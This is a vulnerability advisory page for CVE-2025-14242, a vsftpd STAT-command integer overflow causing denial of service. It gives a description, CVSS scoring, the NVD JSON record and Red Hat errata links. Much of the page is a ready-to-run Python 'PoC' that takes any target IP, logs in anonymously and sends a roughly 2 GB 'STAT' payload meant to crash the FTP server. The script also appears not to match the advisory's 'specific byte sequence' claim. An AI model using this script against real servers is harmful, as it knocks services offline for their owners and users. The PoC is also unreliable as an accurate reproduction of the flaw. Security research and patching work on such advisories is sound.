Security Vulnerability Report
中文
CVE-2025-14242 CVSS 6.5 MEDIUM

CVE-2025-14242

Published: 2026-01-14 16:15:56
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vsftpd < 3.0.5
vsftpd 3.0.3及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-14242 PoC - vsftpd STAT Command Integer Overflow DoS # Author: Security Researcher # Note: This PoC is for educational and authorized testing purposes only import socket import sys def exploit_vsftpd(target_ip, target_port=21): """ Exploit integer overflow in vsftpd STAT command parameter parsing This causes a denial of service by crashing the vsftpd process """ try: # Connect to FTP server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Receive banner banner = sock.recv(1024) print(f"[+] Received banner: {banner.decode().strip()}") # Login with low-privilege user sock.send(b"USER anonymous\r\n") resp = sock.recv(1024) print(f"[+] User response: {resp.decode().strip()}") sock.send(b"PASS anonymous\r\n") resp = sock.recv(1024) print(f"[+] Pass response: {resp.decode().strip()}") # Send crafted STAT command with overflow-triggering parameter # The specific byte sequence triggers integer overflow in ls parsing malicious_payload = b"STAT " + b"A" * 2147483647 + b"\r\n" print(f"[+] Sending malicious STAT command...") sock.send(malicious_payload) # Wait for response or timeout try: resp = sock.recv(1024) print(f"[+] Response: {resp.decode().strip()}") except socket.timeout: print("[*] No response received - service may be crashed") sock.close() return True except socket.error as e: print(f"[-] Socket error: {e}") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 21 print(f"[*] Targeting {target}:{port}") exploit_vsftpd(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14242", "sourceIdentifier": "[email protected]", "published": "2026-01-14T16:15:55.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in vsftpd. This vulnerability allows a denial of service (DoS) via an integer overflow in the ls command parameter parsing, triggered by a remote, authenticated attacker sending a crafted STAT command with a specific byte sequence."}, {"lang": "es", "value": "Se encontró un fallo en vsftpd. Esta vulnerabilidad permite una denegación de servicio (DoS) a través de un desbordamiento de entero en el análisis de parámetros del comando ls, provocado por un atacante remoto y autenticado al enviar un comando STAT manipulado con una secuencia de bytes específica."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:0605", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0606", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0608", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4470", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4477", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4513", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4522", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4525", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4543", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4550", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4553", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:4554", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14242", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419826", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.